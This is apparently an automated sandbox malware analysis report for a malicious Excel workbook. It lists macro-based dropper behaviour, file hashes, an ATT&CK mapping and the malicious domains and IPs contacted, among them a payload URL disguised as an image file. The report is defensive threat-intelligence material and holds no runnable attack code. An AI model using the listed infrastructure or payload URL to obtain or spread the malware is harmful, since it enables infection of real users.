Analysis Report 3F97s4aQjB.xlsx
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Multi AV Scanner detection for domain / URL | Show sources |
Source: | Virustotal: | Perma Link |
Machine Learning detection for dropped file | Show sources |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | File opened: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | Memory has grown: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Contains functionality to create processes via WMI | Show sources |
Source: | Binary or memory string: |
Found abnormal large hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Process Stats: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Key value queried: |
Source: | Window detected: |
Source: | Initial sample: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: |
Persistence and Installation Behavior: |
---|
Creates processes via WMI | Show sources |
Source: | WMI Queries: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Source: | Code function: |
Source: | Evasive API call chain: |
Source: | API coverage: |
Source: | Last function: |
Source: | Code function: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | File source: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Windows Management Instrumentation21 | Path Interception | Process Injection2 | Masquerading121 | OS Credential Dumping | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scripting1 | Boot or Logon Initialization Scripts | Extra Window Memory Injection1 | Disable or Modify Tools1 | LSASS Memory | Security Software Discovery21 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Native API2 | Logon Script (Windows) | Logon Script (Windows) | Process Injection2 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | Exploitation for Client Execution33 | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information1 | NTDS | Account Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting1 | LSA Secrets | System Owner/User Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information2 | Cached Domain Credentials | Remote System Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Extra Window Memory Injection1 | DCSync | System Network Configuration Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | File and Directory Discovery2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Information Discovery14 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
7% | Virustotal | Browse | ||
2% | ReversingLabs |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Joe Sandbox ML | |||
100% | Joe Sandbox ML |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
injuryless.com | 193.178.169.243 | true | true |
| unknown |
pigeonious.com | 95.142.44.93 | true | false | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.178.169.243 | injuryless.com | unknown | 48282 | VDSINA-ASRU | true | |
95.142.44.93 | pigeonious.com | Russian Federation | 210079 | EUROBYTEEurobyteLLCMoscowRussiaRU | false |
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 432818 |
Start date: | 10.06.2021 |
Start time: | 19:28:46 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 12m 39s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | 3F97s4aQjB.xlsx |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 38 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.expl.evad.winXLSX@5/12@2/2 |
EGA Information: |
|
HDC Information: |
|
HCA Information: | Failed |
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
19:29:44 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
193.178.169.243 | Get hash | malicious | Browse |
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
injuryless.com | Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
VDSINA-ASRU | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
EUROBYTEEurobyteLLCMoscowRussiaRU | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 511488 |
Entropy (8bit): | 7.3404073760047375 |
Encrypted: | false |
SSDEEP: | 12288:cyLjvFCsHOFO7t8BmzXiDm/znL2wOhlYuGUoPavYWIJdvrQoDptkYIN:BLDFTHOF0anwGYuGDQ2vQoDk5N |
MD5: | 526D56017EF5105277FE0D366C95C39D |
SHA1: | 78A40D523F4B887B2383681FECE447EF911C24EF |
SHA-256: | 28F2FA4F9AC95C3FC906E201B758D56C6A888B657DCF57C351A4F34FFB3E0FE2 |
SHA-512: | F2DC53598455B422B6B53108E94229B0F5791AC25188F0ED73FB4BFF1DF018B745F1F73714E97CF4E1C52475473326C1C91DC6070D331080F1FAAF696D58841E |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 134922 |
Entropy (8bit): | 5.369120137160444 |
Encrypted: | false |
SSDEEP: | 1536:6cQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:qEQ9DQW+ziXOe |
MD5: | 0A1F23FF748ABC83EE1A72CDC88321CC |
SHA1: | 4BC44446EB9EFC70B3906CCB9C2027CFB370DC9A |
SHA-256: | A05BF9F74150184E3664C14A9B042AF23BB0A75DBA671DB351A1172FF550A47B |
SHA-512: | 6CE5A0DC7CB9A2749451DE3752DCF2E8A37CFDC6B19C53E79782CC00859C1E4333474641E76EE975EAA169CE136E9A4A7771532866437CDBE49DEA5E8EE7047E |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 462772 |
Entropy (8bit): | 7.968569347884841 |
Encrypted: | false |
SSDEEP: | 12288:yycQMfTEzs+VfqjROL5bgSj86X/5ARknBqrZsNAdee:yQMfYBVf1xBARkgaNyr |
MD5: | 5D1C907B7A28ED91D8A704A7CE928FAF |
SHA1: | FA56635F0C2A6D93DABE3E0636DADEAECDFCE804 |
SHA-256: | AD72EF87E54764A13E87BBD446029F48D70114B120E6DA7025947B1D51554486 |
SHA-512: | 52A22A801395A467AABC02B4C24236FCAC4197407FC0F5C4B0D9C79C8DFB9A5DD0D935C67A7730B7EBFCD80013967F392D48D6E697A09E684BCDC62F7DBB6376 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 511488 |
Entropy (8bit): | 7.3404073760047375 |
Encrypted: | false |
SSDEEP: | 12288:cyLjvFCsHOFO7t8BmzXiDm/znL2wOhlYuGUoPavYWIJdvrQoDptkYIN:BLDFTHOF0anwGYuGDQ2vQoDk5N |
MD5: | 526D56017EF5105277FE0D366C95C39D |
SHA1: | 78A40D523F4B887B2383681FECE447EF911C24EF |
SHA-256: | 28F2FA4F9AC95C3FC906E201B758D56C6A888B657DCF57C351A4F34FFB3E0FE2 |
SHA-512: | F2DC53598455B422B6B53108E94229B0F5791AC25188F0ED73FB4BFF1DF018B745F1F73714E97CF4E1C52475473326C1C91DC6070D331080F1FAAF696D58841E |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
IE Cache URL: | https://pigeonious.com/img/logo.png |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1041071 |
Entropy (8bit): | 7.855849071117974 |
Encrypted: | false |
SSDEEP: | 12288:Ip4WH4vcCRa6p1RtTycQMfTEzs+VfqjROL5bgSj86X/5ARknBqrZsNAde+:G4vdRa6p1Rt/QMfYBVf1xBARkgaNyt |
MD5: | E20BC69C6969DDBF5D19950216EBCC79 |
SHA1: | 60809A68836DCE9E7B5959B9D975427C3DDE0122 |
SHA-256: | FDED8F0DDE8CF5DEACFB80DE6420A3CCD4F30971ACC364FF9DB855DE3D86AA4A |
SHA-512: | C48879E97FC9DBBFA30C8554A1B21BC8D36B080F4AD6D4C0223C5F994C47BE4986ECEEBA038E4617EF4D8D65106E21FEA79042997BF107F2921828B35DCEE16D |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2120 |
Entropy (8bit): | 4.714364232851571 |
Encrypted: | false |
SSDEEP: | 24:8zNDaX/da9OUAJHaD0nKD7aB6myzNDaX/da9OUAJHaD0nKD7aB6m:8zNONJDnKaB6pzNONJDnKaB6 |
MD5: | B472516A8AC5D58E2AC16C39CD89EC38 |
SHA1: | 8ADE9F104953A38DA6917729E309528DD86C2E7C |
SHA-256: | 3677EBF291B1C7954ADB892D9D37686C0520C71F33EFF9F8D305985E09D5E0AC |
